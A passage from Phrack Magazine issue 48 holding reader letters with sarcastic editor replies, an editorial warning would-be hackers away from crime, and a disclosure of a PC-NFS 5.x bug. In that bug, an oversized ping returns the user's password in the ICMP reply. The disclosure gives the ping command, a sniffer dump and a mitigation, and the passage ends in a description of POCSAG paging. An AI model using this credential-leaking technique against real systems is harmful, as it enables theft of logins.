a joke , I tryed to make some and Was a great dissapointment ???? [ The meth recipe works just fine. Obviously you DIDN'T try to make it. If you feel like a REAL MORON, look at the cat recipe in the line noise section of this issue. Stay up for a week, go into deep amphetamine psychosis and die! Woo Woo! ] ----------------------------------------------------------------------------- I ve tried to locate these guys who have Black book for cracking passwords in major software and some games as well.They go by the Names of Jolly Reaper and Maugan Ra aka Manix.Iam doc X from London (not a pig!!!) if U happpen to know these doodez let us know.TA from GB [ Perhaps you have Phrack confused with something having to do with pirated software. I'd ask that question in a posting to the USENET group alt.warez or on the IRC #warez channels. ] ----------------------------------------------------------------------------- Eric, i have been searching the internet for some kind of script that will subscribe a certain email address to a shitload of mailing lists...i have heard of such a thing. what im lacking is that keyword to search for such as: bombard attack flash what is the technical term for this kind of attack? or better yet, do you know where to get a hold of such a script. im not familiar with mailing lists and id rather not spend the time researching the topic...but i need vengeance quickly :-) any help appreciated, -roger [ The name for this type of attack? Uh, an email bomb? But let's take a closer look at your mail: "id rather not spend the time researching the topic...but I need vengeance quickly" I'm not going to be your fucking research assistant, or your accomplice. If you can't figure out how to look through our back issues to find any of the tons of fake mailers we've printed, or figure out how to automate them using shell script, then you don't deserve to live, much less get your speedy vengeance. Couldn't you even come up with a NON-LAME way to get back at someone? Hell, even rewriting their .login to say "exit" or something silly like that is more clever, and less cliche, than flooding their inbox. ] ----------------------------------------------------------------------------- The art of " information manipulation " has possessed my virgin soul ! I turned into a fuckin' 2-year old (drool and all) when experiencing the free local call system involving a paperclip . All I've been thinking is hack, haCK, HACK ! I'm still drenched behind the ears but I'm a patient, turbo learner (whatever the hell that means) ! Here's the problem: I possess some info that could make you smile so big, that your sphinctor would unwrinkle. I would like to experiment, if you will . Perhaps, dabble with this stuff , but I am very uneducated in raping mainframes. This could be a major wood producer because my EX works at this establishment . I need a trustworthy pro who possesses a plethora of tasty tactics . Whic h way to the Dagobah System.....I seek YODA !! [ Drooling 2-year old. Very uneducated in raping mainframes. Major wood producer. Well, gee, I'm sure your info would make my "sphinctor" unwrinkle, but I'm wearing a new pair of jeans, so I guess I'll have to take a rain check. God bless AOL for bringing the internet to the masses! ] ----------------------------------------------------------------------------- i want to be added to your list. and could you send me unziped hacking software or can you tell me how to unzip softwarre nd a beginners guide to hacking. i would appreciate it i want to begin fun new field of hacking thank you [ You want to learn all about hacking, but you don't know how to unzip files? Crawl before you run, Kwai Chang. ] ----------------------------------------------------------------------------- VA'CH CO' TAI Anh Ta'm ddi du li.ch xa, ngu? ta.i mo^.t kha'ch sa.n. DDa~ ma^'y tie^'ng ddo^`ng ho^` ro^`i anh ngu? kho^ng ddu*o*.c vi` tie^'ng cu*o*`i no'i huye^n na'o tu*` pho`ng be^n ca.nh vo.ng sang. Ro~ ra`ng la` ho. ddang dda'nh ba`i, sa't pha.t nhau a(n thua lo*'n. Ra'ng nhi.n cho to*'i 3 gio*` sa'ng va^~n cu*' tra(`n tro.c hoa`i, anh Ta'm chi.u he^'t no^?i, be`n go~ nhe. va`o va'ch dde^? nha('c khe'o pho`ng be^n ca.nh. Anh Ta'm vu*`a go~ xong la^.p tu*'c anh nghe mo^.t gio.ng tenor he't le^n tu*` pho`ng be^n: - Tro*`i o*i! Co' bie^'t ba^y gio*` la` ma^'y gio*` sa'ng ro^`i kho^ng? O*? ddo' ma` ddo'ng ddinh treo hi`nh! - ?!?!? [Uh, let's see...No Boom Boom with soul brother. Soul Brother too beaucoup. Ddi Ma'o.] ----------------------------------------------------------------------------- Hola me gustaria tener mucha informacion de lo que ustedes hacen sobre todo de como lo hacen. Es decir que me manden informacion de los secretos de los sistemas operativos de internet de todo lo que me puedan mandar. yo soy universitario, y me gusta todo lo relacionado con redes. Muchos saludos. Contestenme. [ What is this, International Day? !Si quieras mucha informacion, LEA MUCHOS LIBROS! !DIOS MIO! !No estoy el maestro del mundo! Ehehe, esta fue solomente una chiste. No esta nunca libros en espanol sobre <>. Que lastima. If you want to learn, start with english...then go buy the entire O'Reilly Yellow series and Blue series. That will get you started learning "los secretos de los sistemas operativos de internet." ] ----------------------------------------------------------------------------- From: "Erik K. Escobar" Subject: Apology This letter is to be forwared to the newsgroup io.general by madmagic, in care of Mr. Escobar. I would like to send a public apology to Internex Online for the treatment I have given the staff and users of this system. I threw around some threats and words that can incriminate me, and realized that it was a stupid idea on my behalf. In the last week or so with the negative attention I have gotten, I got to know the IO/ICAN staff a bit better and everything in good standing. Me and Internex Online are now even and there will be no retaliation or sour words from me. I just want everything to go back to the norm. Erik [ * AND THEN * ] From: "Erik K. Escobar" Subject: Shit As my understanding, A letter of apology under my name was redistributed around within my mailing list and whatever. As some of you know, myself and Zencor have been having problems with Internex in the past and near the middle of this week, I got into a large battle with was ACC, ICAN, and Internex Online -vs- Me. It is stupid to get into an argument with that many corporations, and a few words and threats were thrown, they locked my account. I wrote a letter in response of that and they proceded to lock other Zencor staff accounts and hack our web site. Also they posted the letter in the news groups and whatever. They eventually decided to charge me and whatever, and to save me time outta the courts and crap like that I made an apology for the threats, seeing that they could incriminate me. Internex has done wrong and I probably won't be seeing alot of apologies coming my way. If they didn't have certain info about me..they could have me very well laughing at them but that is not the case. Erik Lord Kaotik [ ZENC0R TECHN0L0GIES ] [ Can you say, LAME? ] ----------------------------------------------------------------------------- Been trying to locate for some time the file, plusmap.txt that used to be on the phrack bbs (716-871-1915). This file outlined information regarding the videopal in the videocipher II plus satellite decoder module. Any idea where I might find this file? [ I didn't know there was a "phrack" bbs. In any case, I would look for information regarding this on the following sites: http://www.scramblingnews.com http://www.hackerscatalog.com http://ireland.iol.ie/~kooltek/welcome.html Satellite Watch BBS : 517-685-2451 This ought to get you in the right direction. ] ----------------------------------------------------------------------------- Hi, Just a quick note to tell you about the Hawaii Education Literacy Project - a non-profit organization - and our efforts to promote literacy by making electronic text easier and more enjoyable to read. Given that we're both in the reading biz, I thought you might be interested. ReadToMe, our first program, reads aloud any form of electronic text, including Web pages, and is free to anyone who wishes to use it. The "Web Designers" section of our home page tells you how your pages can literally speak to your audience. Actually, all you need to do to make your pages audible is to add the following html code:

Hear This Page! Requires ReadToMe Software... Don't got it? GET IT FREE!

A beta test version of the program can be obtained from http://www.pixi.com/~reader1. I encourage you and your readers to download a copy and take it for a spin. Thank you for your time, Rob Hanson rhanson@freeway.net Hawaii Education Literacy Project [ Honestly, I don't know if this is a spam to a list of magazine people, or really a phrack reader. I have this thing about jumk email, and the joy of offering that info to our thousands of bored hacker readers looking for an excuse to fuck with some system. I'll let them decide if this was a spam. Thanks, Rob. ] ----------------------------------------------------------------------------- ******************************** SYNTHETIC PLEASURES opens in the US theaters ******************************** save the date, spread the word. forgive us if you got this before. ----------------------------------------------------------------------- eerily memorable is SYNTHETIC PLEASURES, a trippy, provocative tour through the perfectly artificial worlds of cyberspace, plastic surgery, mind-altering chemicals and controlled, man-made environments that questions whether the natural world is redundant, or even necessary. those who see it will want to pinch themselves when it's over. (janet maslin- The New York Times) ------------------------------------------------------------------------ for further info contact: caipirinha@caipirinha.com http://www.syntheticpleasures.com first opening dates: Aug 29 Los Angeles, CA- Nuart Theatre Aug 30 San Francisco, CA- Castro Theatre Aug 30 Berkeley, CA- UC Theatre Aug 30 San Jose, CA- Towne Theatre Aug 30 Palo Alto, CA- Aquarius Theatre Aug 30 Portland, OR- Cinema 21 Sept 13 San Diego, CA- Ken Theatre Sept 13 NYC, NY- Cinema Village Sept 13 NYC, NY- City Cinemas Sept 13 Larkspur, CA- Larkspur Theatre Sept 20 Boston, MA- Kendall Square Theater Sept 20 Cleveland, OH- Cedar Lee Sept 20 Philadelphia, PA- Ritz Sept 22 Vorheess, NJ- Ritz 12 Sept 27 Austin, TX- Dobie Theater Sept 27 New Haven, CT- York Theatre Sept 27 Pittsburgh,PA- Rex Oct 4 Washington, DC- Key Cinema Oct 11 Providence, RI- Avon Theater Oct 11 Kansas City, MO- Tivoli Oct 11 Baltimore,MD - Charles Theatre Oct 18 Waterville MA- Railroad Square Oct 18 Durham,NC - Carolina Theater Oct 18 Raleigh, NC - Colony Theater Oct 18 Chapel Hill,NC -The Chelsea Theatre Oct 25 Seattle, WA- Varsity Nov 8 Ft Lauderdale FL- Fox Sunrise Nov 15 Gainesville,FL - Plaza Theater Nov 16 Hanover, NH- Dartmouth Theater Nov 22 Miami, FL- Alliance Nov 25,29,30 Tampa FL - Tampa Theatre Dec 13 Chicago, IL - Music Box [ THIS WAS DEFINATELY A SPAM. I wonder what lovely cgi-bin holes that WWW site is sporting. But wait, maybe they just want some k-rad cyber-press like MGM got for the "Hackers" WWW page. Oh man, what a dilemma. To hack, or not to hack. Assholes. ] ----------------------------------------------------------------------------- ==Phrack Magazine== Volume Seven, Issue Forty-Eight, File 2a of 18 Phrack Editorial by Erik Bloodaxe This may very well be my last Phrack editorial, since I'm no longer going to fill the day-to-day role of editor, so I figure I ought to close out my crusade to piss everyone off. I don't like most of you people. The hacking subculture has become a mockery of its past self. People might argue that the community has "evolved" or "grown" somehow, but that is utter crap. The community has degenerated. It has become a media-fueled farce. The act of intellectual discovery that hacking once represented has now been replaced by one of greed, self-aggrandization and misplaced post-adolescent angst. DefCon IV epitomized this change in such amazing detail, that I can only hope to find words to describe it adequately. Imagine the bastard offspring of Lollapalooza and a Star Trek convention. Imagine 300+ people out of their homes, and away from Mother's watchful eye for the first time in their pathetic lives. Imagine those same people with the ego of Rush Limbaugh and the social skills of Jeffrey Dahmer, armed with laptops loaded with programs they can't use, and talking at length to reporters about techniques they don't understand. Welcome to DefCon. If I were to judge the health of the community by the turnout of this conference, my prognosis would be "terminally ill." It would seem that "hacking" has become the next logical step for many people looking for an outlet to strike back at "something." "Well, gee, I've already pierced every available piece of skin on my body and dyed my hair blue...what on earth can I do now to shock my parents? I know! I'll break some federal laws, and maybe get my name in the paper! THAT WOULD BE COOL! It'll be just like that movie!" I hate to burst everyone's bubble, but you are so fucked up. In this day and age, you really don't have to do anything illegal to be a hacker. It is well within the reach of everyone to learn more, and use more powerful computers legally than any of us from the late 70's and early 80's ever dreamed. Way back then, it was ALL about learning how to use these crazy things called computers. There were hundreds of different types of systems, hundreds of different networks, and everyone was starting from ground zero. There were no public means of access; there were no books in stores or library shelves espousing arcane command syntaxes; there were no classes available to the layperson. We were locked out. Faced with these obstacles, normal, intelligent, law-abiding adolescents from around the globe found themselves attempting to gain access to these fascinating machines through whatever means possible. There simply was no other way. There were no laws, and yet everyone knew it wasn't strictly kosher behavior. This fact added a cheap rush to the actual break-in, but the main drive was still simply to learn. Now, with the majority of operating systems being UNIX-based, and the majority of networks being TCP/IP-based the amount of knowledge to be gathered has shrunk considerably. With the incredibly low prices of powerful personal computers, and the free availablity of complex operating systems, the need to break into remote systems in order to learn has been removed. The only possible needs being met by remote intrusions would be a means to gather specific information to be sold, or that base psychological rush from doing something forbidden and getting away with it. Chasing any high only leads to a serious crash, and in the case of breaking into computers, that only leads to jail. There is absolutely nothing cool about going to jail. I know too many people who are currently in jail, who have been in jail, and some who are on their way to jail. Trust me on this, people. You will not be respected by anyone if you act rashly, do something careless and end up being convicted of several felonies. In fact, all of your "friends," (those who didn't get busted along with you, and turn state's evidence against you) will just think you were a moron for being so sloppy...until they also get nailed. Get raided and you will almost certainly spend time in jail. Even once you are released, you will lose your passport and your ability to travel freely, you will lose your ability to do business in classified environments, you will become unemployable by most companies, you may even lose your rights to use computer or networking equipment for years. Is is still worth it? I break into computers for a living, and I love my job. However, I don't kid myself about just how lucky I really am. Don't fool yourselves into thinking that it was easy for me to achieve this, or that anyone else can easily slip into such a role. Staking out a claim in the information security industry is a continual battle for a hacker. Your past will constantly stand in your way, especially if you try to hide it and lie to everyone. (Read the recent Forbes ASAP article and spot the hacker from Garrison Associates lying about his past, although he was raided for running the Scantronics Publications BBS in San Deigo just a few short years ago. Shame on you Kludge.) I've never lied about anything, so that can't be held over my head. I've never been convicted of anything either, although I came closer to jail than hopefully any of you will ever experience. The ONLY reason I avoided prison was the fact that law enforcement was not prepared to deal with that type of crime. Now, I've taught many of those same law enforcement agencies about the nature of computer crimes. They are all learning and not making the same mistakes any more. At the same time, the technology to protect against intrusions has increased dramatically. Technology now exists that will not only stop attacks, but identify the attack methodology, the location of the attacker, and take appropriate countermeasures all in real-time. The company I work for makes it. I've always said that anything that can stop me will stop almost anyone, even through I'm not anywhere close to the world's best. There simply aren't that many things to monitor, once you know what to look for. The rewards have diminished and the risks have increased. Hacking is not about crime. You don't need to be a criminal to be a hacker. Hanging out with hackers doen't make you a hacker any more than hanging out in a hospital makes you a doctor. Wearing the t-shirt doesn't increase your intelligence or social standing. Being cool doesn't mean treating everyone like shit, or pretending that you know more than everyone around you. Of course, I'm just a bitter old sell-out living in the past, so what do I know? Well, what I do know, is that even though I'm one of the few screaming about how fucked up and un-fun everything has become, I'm not alone in my disgust. There are a bunch of us who have reached the conclusion that the "scene" is not worth supporting; that the cons are not worth attending; that the new influx of would-be hackers is not worth mentoring. Maybe a lot of us have finally grown up. In response, expect a great many to suddenly disappear from the cons. We'll be doing our own thing, drinking a few cool drinks someplace warm, and reflecting on the collective pasts we've all drawn from, and how the lack of that developmental stage has ruined the newer generations. So those of us with that shared frame of reference will continue to meet, enjoy each other's company, swap stock tips in the same breath as operating system flaws, and dream about the future of security. You're probably not invited. ----------------------------------------------------------------------------- ==Phrack Magazine== Volume Seven, Issue Forty-Eight, File 3 of 18 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== Part I ------------------------------------------------------------------------------ PC-NFS Bug I have found a nice little security hole in PC-NFS version 5.x. If you ping a PC-NFS user with a packet size of between 1450 to 1480, the PC's ICMP reply packet will divulge: o The hostname of the PC o The hostname of the PC's authentication server o The username of the person logged in o The password for the user (Thank you very much!) All of this information is in clear text unless PC-NFS's NETLOGIN is used. NETLOGIN uses XOR as its encryption, so this is hardly secure either. NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested and all freely return the above information on both PC-NFS versions 5.0 and 5.1a. This should work with other driver/NIC configurations also. You get the occasional added bonus of locking up the victims PC as well! This bug was new to Sun and they have created a new PCNFS.SYS driver for us. They have labeled it PC-NFS.SYS version 5.1a.DOD. This new version fills reply ICMP packets with nulls after 200 bytes of the requested pattern. Until you receive this patch from Sun, I would recommend setting all external router interface MTU to a value of no greater than 1350 as this is point where secrets are contained in the return packet. The Unix command to generate the below results is as follows: ping -s -c1 pchost.victim.com 1480 Use your favorite sniffer to filter ICMP packets and you have it. If you don't have a sniffer, try the -v(erbose) option of ping and convert the hex to ascii starting around byte 1382. Sniffer output follows: 19:03:48.81 ip: evil.com->pchost.victim.com icmp: echo request 62: 024 025 026 027 030 031 032 033 034 035 72: 036 037 ! " # $ % & ' 82: ( ) * + , - . / 0 1 92: 2 3 4 5 6 7 8 9 : ; 102: < = > ? @ A B C D E 112: F G H I J K L M N O 122: P Q R S T U V W X Y 132: Z [ \ ] ^ _ ` a b c 142: d e f g h i j k l m 152: n o p q r s t u v w 162: x y z { | } ~ 177 200 201 172: 202 203 204 205 206 207 210 211 212 213 182: 214 215 216 217 220 221 222 223 224 225 192: 226 227 230 231 232 233 234 235 236 237 202: 240 241 242 243 244 245 246 247 250 251 212: 252 253 254 255 256 257 260 261 262 263 222: 264 265 266 267 270 271 272 273 274 275 232: 276 277 300 301 302 303 304 305 306 307 242: 310 311 312 313 314 315 316 317 320 321 252: 322 323 324 325 326 327 330 331 332 333 262: 334 335 336 337 340 341 342 343 344 345 272: 346 347 350 351 352 353 354 355 356 357 282: 360 361 362 363 364 365 366 367 370 371 292: 372 373 374 375 376 377 000 001 002 003 302: 004 005 006 007 010 011 012 013 014 015 312: 016 017 020 021 022 023 024 025 026 027 322: 030 031 032 033 034 035 036 037 ! 332: " # $ % & ' ( ) * + 342: , - . / 0 1 2 3 4 5 352: 6 7 8 9 : ; < = > ? 362: @ A B C D E F G H I 372: J K L M N O P Q R S 382: T U V W X Y Z [ \ ] 392: ^ _ ` a b c d e f g 402: h i j k l m n o p q 412: r s t u v w x y z { 422: | } ~ 177 200 201 202 203 204 205 432: 206 207 210 211 212 213 214 215 216 217 442: 220 221 222 223 224 225 226 227 230 231 452: 232 233 234 235 236 237 240 241 242 243 462: 244 245 246 247 250 251 252 253 254 255 472: 256 257 260 261 262 263 264 265 266 267 482: 270 271 272 273 274 275 276 277 300 301 492: 302 303 304 305 306 307 310 311 312 313 502: 314 315 316 317 320 321 322 323 324 325 512: 326 327 330 331 332 333 334 335 336 337 522: 340 341 342 343 344 345 346 347 350 351 532: 352 353 354 355 356 357 360 361 362 363 542: 364 365 366 367 370 371 372 373 374 375 552: 376 377 000 001 002 003 004 005 006 007 562: 010 011 012 013 014 015 016 017 020 021 572: 022 023 024 025 026 027 030 031 032 033 582: 034 035 036 037 ! " # $ % 592: & ' ( ) * + , - . / 602: 0 1 2 3 4 5 6 7 8 9 612: : ; < = > ? @ A B C 622: D E F G H I J K L M 632: N O P Q R S T U V W 642: X Y Z [ \ ] ^ _ ` a 652: b c d e f g h i j k 662: l m n o p q r s t u 672: v w x y z { | } ~ 177 682: 200 201 202 203 204 205 206 207 210 211 692: 212 213 214 215 216 217 220 221 222 223 702: 224 225 226 227 230 231 232 233 234 235 712: 236 237 240 241 242 243 244 245 246 247 722: 250 251 252 253 254 255 256 257 260 261 732: 262 263 264 265 266 267 270 271 272 273 742: 274 275 276 277 300 301 302 303 304 305 752: 306 307 310 311 312 313 314 315 316 317 762: 320 321 322 323 324 325 326 327 330 331 772: 332 333 334 335 336 337 340 341 342 343 782: 344 345 346 347 350 351 352 353 354 355 792: 356 357 360 361 362 363 364 365 366 367 802: 370 371 372 373 374 375 376 377 000 001 812: 002 003 004 005 006 007 010 011 012 013 822: 014 015 016 017 020 021 022 023 024 025 832: 026 027 030 031 032 033 034 035 036 037 842: ! " # $ % & ' ( ) 852: * + , - . / 0 1 2 3 862: 4 5 6 7 8 9 : ; < = 872: > ? @ A B C D E F G 882: H I J K L M N O P Q 892: R S T U V W X Y Z [ 902: \ ] ^ _ ` a b c d e 912: f g h i j k l m n o 922: p q r s t u v w x y 932: z { | } ~ 177 200 201 202 203 942: 204 205 206 207 210 211 212 213 214 215 952: 216 217 220 221 222 223 224 225 226 227 962: 230 231 232 233 234 235 236 237 240 241 972: 242 243 244 245 246 247 250 251 252 253 982: 254 255 256 257 260 261 262 263 264 265 992: 266 267 270 271 272 273 274 275 276 277 1002: 300 301 302 303 304 305 306 307 310 311 1012: 312 313 314 315 316 317 320 321 322 323 1022: 324 325 326 327 330 331 332 333 334 335 1032: 336 337 340 341 342 343 344 345 346 347 1042: 350 351 352 353 354 355 356 357 360 361 1052: 362 363 364 365 366 367 370 371 372 373 1062: 374 375 376 377 000 001 002 003 004 005 1072: 006 007 010 011 012 013 014 015 016 017 1082: 020 021 022 023 024 025 026 027 030 031 1092: 032 033 034 035 036 037 ! " # 1102: $ % & ' ( ) * + , - 1112: . / 0 1 2 3 4 5 6 7 1122: 8 9 : ; < = > ? @ A 1132: B C D E F G H I J K 1142: L M N O P Q R S T U 1152: V W X Y Z [ \ ] ^ _ 1162: ` a b c d e f g h i 1172: j k l m n o p q r s 1182: t u v w x y z { | } 1192: ~ 177 200 201 202 203 204 205 206 207 1202: 210 211 212 213 214 215 216 217 220 221 1212: 222 223 224 225 226 227 230 231 232 233 1222: 234 235 236 237 240 241 242 243 244 245 1232: 246 247 250 251 252 253 254 255 256 257 1242: 260 261 262 263 264 265 266 267 270 271 1252: 272 273 274 275 276 277 300 301 302 303 1262: 304 305 306 307 310 311 312 313 314 315 1272: 316 317 320 321 322 323 324 325 326 327 1282: 330 331 332 333 334 335 336 337 340 341 1292: 342 343 344 345 346 347 350 351 352 353 1302: 354 355 356 357 360 361 362 363 364 365 1312: 366 367 370 371 372 373 374 375 376 377 1322: 000 001 002 003 004 005 006 007 010 011 1332: 012 013 014 015 016 017 020 021 022 023 1342: 024 025 026 027 030 031 032 033 034 035 1352: 036 037 ! " # $ % & ' 1362: ( ) * + , - . / 0 1 1372: 2 3 4 5 6 7 8 9 : ; 1382: < = > ? @ A B C D E 1392: F G H I J K L M N O 1402: P Q R S T U V W X Y 1412: Z [ \ ] ^ _ ` a b c 1422: d e f g h i j k l m 1432: n o p q r s t u v w 1442: x y z { | } ~ 177 200 201 1452: 202 203 204 205 206 207 210 211 212 213 1462: 214 215 216 217 220 221 222 223 224 225 1472: 226 227 230 231 232 233 234 235 236 237 1482: 240 241 242 243 244 245 246 247 250 251 19:03:48.85 ip: pchost.victim.com->evil icmp: echo reply 62: 024 025 026 027 030 031 032 033 034 035 72: 036 037 ! " # $ % & ' 82: ( ) * + , - . / 0 1 92: 2 3 4 5 6 7 8 9 : ; 102: < = > ? @ A B C D E 112: F G H I J K L M N O 122: P Q R S T U V W X Y 132: Z [ \ ] ^ _ ` a b c 142: d e f g h i j k l m 152: n o p q r s t u v w 162: x y z { | } ~ 177 200 201 172: 202 203 204 205 206 207 210 211 212 213 182: 214 215 216 217 220 221 222 223 224 225 192: 226 227 230 231 232 233 234 235 236 237 202: 240 241 242 243 244 245 246 247 250 251 212: 252 253 254 255 256 257 260 261 262 263 222: 264 265 266 267 270 271 272 273 274 275 232: 276 277 300 301 302 303 304 305 306 307 242: 310 311 312 313 314 315 316 317 320 321 252: 322 323 324 325 000 000 324 005 ^ $ 262: : 004 000 000 000 000 000 000 000 000 272: 036 006 W V P S Q R 016 007 282: 277 ^ $ 213 367 350 X p r c 292: 212 E " < 000 u 005 350 V 003 302: 353 W < 005 u 005 350 W 002 353 312: N < 010 u 007 306 006 325 # 001 322: 353 H < 015 u 007 306 006 325 # 332: 001 353 = < 017 u 007 306 006 325 342: # 001 353 2 < 022 u 005 350 021 352: 002 353 $ < 003 u 005 350 9 003 362: 353 033 < 022 w 017 2 344 213 360 372: 212 204 300 # P 350 225 305 X 353 382: 010 P 270 c 000 350 213 305 X 306 392: 006 205 347 000 Z Y [ X ^ _ 402: 007 037 313 P S Q R U 036 006 412: W V 214 310 216 330 216 300 306 006 422: 325 # 000 373 277 ^ $ 273 A 347 432: 271 006 000 215 6 d $ 212 004 210 442: 005 212 007 210 004 F G C 342 363 452: 241 x $ 243 | $ 241 z $ 243 462: ~ $ 241 324 ) 243 x $ 241 326 472: ) 243 z $ 277 ^ $ 212 E " 482: < 010 u 015 P 270 ` 000 350 $ 492: 305 X 350 275 001 353 022 < 015 u 502: 012 P 270 a 000 350 023 305 X 353 512: 004 < 017 u 003 350 017 000 306 006 522: 205 347 000 ^ _ 007 037 ] Z Y 532: [ X 303 P 270 < 000 350 363 304 542: X 307 E $ 000 000 215 u " 213 552: M 020 206 351 203 351 024 367 301 001 562: 000 t 006 213 331 306 000 000 A 321 572: 371 350 , o 211 ] $ 307 E 030 582: 000 000 215 u 016 271 012 000 350 033 592: o 211 ] 030 213 E 020 206 340 005 602: 016 000 243 ` % 211 > b % 214 612: 016 d % 277 ^ % . 376 006 ? 622: 020 350 9 276 . 376 016 ? 020 303 632: & 213 E 002 013 300 t 020 243 326 642: # & 213 ] 004 211 036 330 # 350 652: 231 m 353 0 200 > 324 ) 000 t 662: 033 & 203 } 006 000 t 024 203 > 672: 326 # 000 u 015 350 031 000 203 > 682: 326 # 000 t 003 350 u m 241 326 692: # & 211 E 002 241 330 # & 211 702: E 004 303 & 213 M 006 006 V W 712: 016 007 272 000 000 277 334 # 350 $ 722: 000 241 323 # 243 350 X 203 > 326 732: # 000 u 023 366 006 343 015 001 u 742: 014 203 > 350 X 000 u 353 272 001 752: 000 342 332 _ ^ 007 303 Q R W 762: 203 372 000 u 021 203 > 030 214 000 772: t 012 276 004 214 271 003 000 363 245 782: 353 010 270 377 377 271 003 000 363 253 792: 276 A 347 271 003 000 363 245 _ 270 802: 377 377 211 E 036 211 E 241 324 812: ) 211 E 032 241 326 ) 211 E 034 822: 270 000 206 340 211 E 020 306 E 832: 016 E 306 E 017 000 307 E 022 000 842: 000 307 E 024 000 000 306 E 026 002 852: 306 E 027 001 307 E 014 010 000 3 862: 300 306 E " 021 210 E # 211 E 872: & 211 E ( 350 250 376 Z Y 303 882: 200 > 326 # 000 u 014 213 E * 892: 243 326 # 213 E , 243 330 # P 902: 270 V 000 350 205 303 X 303 P S 912: Q R 213 E : 213 ] < 213 M 922: & 213 U ( 350 223 k Z Y [ 932: X P 270 \ 000 350 e 303 X 303 942: 306 E " 000 P 270 X 000 350 X 952: 303 X 303 & 213 E 002 & 213 ] 962: 004 & 213 U 006 006 W 016 007 350 972: Y i s 003 351 227 000 277 334 # 982: W 271 003 000 363 245 276 A 347 271 992: 003 000 363 245 _ 211 E 036 211 ] 1002: 241 324 ) 211 E 032 241 326 ) 1012: 211 E 034 270 000 206 340 211 E 1022: 020 306 E 016 E 306 E 017 000 307 1032: E 022 000 000 307 E 024 000 000 306 1042: E 026 377 306 E 027 001 307 E 014 1052: 010 000 3 300 306 E " 010 210 E 1062: # 211 E & 377 006 h % 241 h 1072: % 211 E ( 211 026 350 X 211 026 1082: l % 307 006 j % 000 000 350 322 1092: 375 203 > 350 X 000 t # 366 006 1102: 343 015 001 u ! 203 > j % 000 1112: t 353 203 > j % 001 u 011 241 1122: l % + 006 350 X 353 015 270 375 1132: 377 353 010 270 376 377 353 003 270 377 1142: 377 307 006 l % 000 000 _ 007 & 1152: 211 E 010 303 P 270 ^ 000 350 206 1162: 302 X 203 > l % 000 t 017 213 1172: ] ( ; 036 h % u 006 307 006 1182: j % 001 000 303 P 270 ; 000 350 1192: g 302 X 203 > l % 000 t 006 1202: 307 006 j % 002 000 303 000 000 000 1212: 000 000 000 000 000 000 000 000 000 000 1222: 000 000 000 000 000 000 000 000 000 000 1232: 000 000 000 000 000 000 000 000 000 000 1242: 000 000 000 000 000 000 000 000 002 000 1252: 000 000 300 A 000 000 034 000 000 000 1262: 200 000 000 000 k 000 000 000 000 016 1272: 000 000 000 000 000 000 000 000 000 1282: 010 000 000 000 252 001 000 000 010 5 1292: 000 000 r 027 301 . 000 000 000 000 1302: 036 F 300 . 000 000 000 000 036 F 1312: 300 . 000 000 000 000 000 000 000 000 1322: 000 000 000 000 000 000 000 000 000 000 1332: 000 000 000 000 000 000 000 000 000 000 1342: 000 000 000 000 000 000 000 000 000 1352: 000 000 000 002 000 000 200 366 = 000 1362: { 255 023 000 242 265 015 000 002 000 1372: 000 000 S 017 005 000 C 003 000 000 1382: p c h o s t 000 000 000 000 1392: 000 000 000 000 000 000 244 A @ - 1402: s e r v e r 1 000 000 000 1412: 000 000 000 000 000 000 244 A @ 001 1422: 000 000 000 000 000 000 000 000 000 000 1432: 000 000 000 000 000 000 244 A @ 001 1442: u s e r n a m e 000 000 1452: p a s s w d 000 000 000 000 1462: 000 000 000 000 000 000 000 000 000 000 1472: 000 000 000 000 000 000 000 000 000 000 1482: 000 000 200 000 k 000 260 271 377 377 1492: 344 275 9 212 The names have been changed to protect the innocent, but the rest is actual. Byte 1382: PC's hostname Byte 1402: PC's Authentication server hostname Byte 1382: The user's account name. Shows nobody if logged out. Byte 1382: The user's password. ------------------------------------------------------------------------------ POCSAG paging format, code and code capacity The POCSAG (Post Office Code Standardization Advisory Group) code is a synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH structure. The POCSAG codes provides improved battery-saving capability and an increased code capacity. The POCSAG code format consists of a preamble and one or more batches of codewords. Each batch comprises a 32-bit frame synchronization code and eight 64-bit address frames of two 32-bit addresses or idle codewords each. The frame synchronization code marks the start of the batch of codewords. -PREAMBLE STRUCTURE The preamble consists of 576 bits of an alternating 101010 pattern transmitted at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to determine if the data received is a POCSAG signal and for synchronization with the stream of data. |---Preamble----|-----------First Batch-------------|--Subsec. Batch--| ______________________________________________________< <____________ paging | 576 bits of | | | | | | | | | | | > > | format | reversals |F| | | | | | | | | | | | | | | | |F| | | (101010, etc) |S| | | | | | | | | | | | | | | | |S| | |_______________|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|__< <____________| > > 1 FRAME = 2 CODEWORDS Preamble Batchs 512 BPS 1125 mS 1062.5 mS 1200 BPS 480 mS 453.3 mS CodeWords Structure ____________________________________________________________________ BIT | | | | | | NUMBER | 1 | 2 to 19 | 20,21 | 22 to 31 | 32 | |___|______________|_______|_______________________|_________________| ____________________________________________________________________ ADDRESS| | | | | | FORMAT | 0 | Address Bits | S I B | Parity Check Bits | Even parity | |___|______________|_______|_______________________|_________________| ^ Source identifier bits ____________________________________________________________________ MESSAGE| | | | | FORMAT | 1 | Message Bits | Parity Check Bits | Even parity | |___|______________________|_______________________|_________________| -BATCH STRUCTURE A batch consist of frame synchronization code follow by 8 frames of two address codewords per frame (16 address codewords per batch). In order to maintain the proper batch structure, each frame is filled with two address codewords, or two idle codewords, or two message codewords, or any appropriate combination of the three codewords types. -FRAME SYNCHRONIZATION CODE STRUCTURE The frame synchronization (FS) code is a unique, reserved word that is used to identify the beginning of each batch. The FS code comprises the 32 bits: 011111100110100100001010111011000. -OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS An alternate frame synchronization (AFS) code can be selected to support special systems or systems that require increased coding capability. The AFS is generated in the same manner as an address codeword (i.e., BCH codeword with parity bits). The POCSAG signaling standard has reserved special codewords for the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging system to support the AFS. The AFS will change to frame 0 on the programmer since no frame information is included in the AFS. The AFS should use address 1 so that bit 20 and 21 are 0. -ADDRESS CODEWORD STRUCTURE An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are the address bits. The pagers looks at these bits to find its own unique address. Each POCSAG codeword is capable of providing address information for four different paging sources (Address 1 to 4). These address are determined by 